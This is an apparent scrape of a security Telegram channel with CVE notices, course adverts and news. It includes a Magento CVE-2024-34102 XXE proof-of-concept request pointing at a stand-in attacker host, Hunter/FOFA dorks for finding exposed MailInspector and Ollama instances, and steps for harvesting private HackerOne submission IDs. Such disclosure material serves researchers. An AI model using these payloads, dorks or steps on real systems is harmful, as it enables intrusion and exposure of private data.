Brut Security pinned ยซKeep checking my old Posts to continue your learning Process!ยป
Methods for Dump LSASS.pdf
33.4 MB
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ2
Please open Telegram to view this post
VIEW IN TELEGRAM
๐6โคโ๐ฅ5๐ฅ1
Hunter: web.title=="..:: HSC MailInspector ::.."
FOFA: title=="..:: HSC MailInspector ::.."
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
๐จCVE-2024-34470: Path Traversal vulnerability in HSC Mailinspector! #computersecurity #cybersec
๐จCVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector!๐An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2....
๐ฅ4โคโ๐ฅ1๐1
๐ฅ Registration Open for July Batch: Extreme Web Application Penetration Testing ๐ฅ
โ ๏ธ Slots Remaining 4
๐ฏRegistration Link: https://lnkd.in/g7MjfrXG
Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!
๐ฅ Starts: July Mid, 2024
โน๏ธ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
โธ Mode: Online | Language: English
๐ Course Module: https://lnkd.in/gfZbBCFn
๐ฏRegistration Link: https://lnkd.in/g7MjfrXG
Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!
โน๏ธ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
โธ Mode: Online | Language: English
๐ Course Module:
Please open Telegram to view this post
VIEW IN TELEGRAM
lnkd.in
LinkedIn
This link will take you to a page thatโs not on LinkedIn
๐1
ceh-v12-exam-set.pdf
1.6 MB
Please open Telegram to view this post
VIEW IN TELEGRAM
๐1
This media is not supported in your browser
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
๐6๐คก5๐คฃ2๐ณ1๐ค1
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ3โคโ๐ฅ1
https://wa.me/message/NQLPOBIAEFDBN1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
๐คฏ1
Looking for someone who can contribute on the next 30 days Bug Bounty Challenge.
Similar to this https://nas.io/brutsecurity
Similar to this https://nas.io/brutsecurity
๐จCVE-2024-37032: ProbllamaโOllama Remote Code Execution Vulnerability
โ ๏ธThe issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.
๐ฅPoC: https://lnkd.in/gk6Wvq_P
๐ฅDorks:
Hunter: /product.name="Ollama Web"
FOFA: app="Ollama-Web"
โ ๏ธThe issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.
๐ฅPoC: https://lnkd.in/gk6Wvq_P
๐ฅDorks:
Hunter: /product.name="Ollama Web"
FOFA: app="Ollama-Web"
๐ฅ1
CVE-2024-34102 POC
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
๐8
IDOR on HackerOne Embedded Submission Form ๐ฐ ๐ฒ
-
Steps to reproduce (obtaining inactive UUID of many private programs)
1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
-
Steps to reproduce (obtaining inactive UUID of many private programs)
1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
HackerOne
HackerOne | Global leader in offensive security | Security for AI | Crowdsourced Security
HackerOne combines AI with the ingenuity of the largest community of security researchers to find and fix security, privacy, and AI vulnerabilities across the SDLC. HackerOne offers AI red teaming, crowdsourced security, bug bounty, vulnerability disclosureโฆ
๐3
China now has their own GitHub/public Git repository hosting service called GitCode; it is owned and operated by CSDN under the company name "้ๅบๅผๆบๅ
ฑๅ็งๆๆ้ๅ
ฌๅธ"
It is being reported that many users' repository are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing.
tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.
Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA
#github #gitcode
It is being reported that many users' repository are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing.
tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.
Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA
#github #gitcode
๐ณ3๐1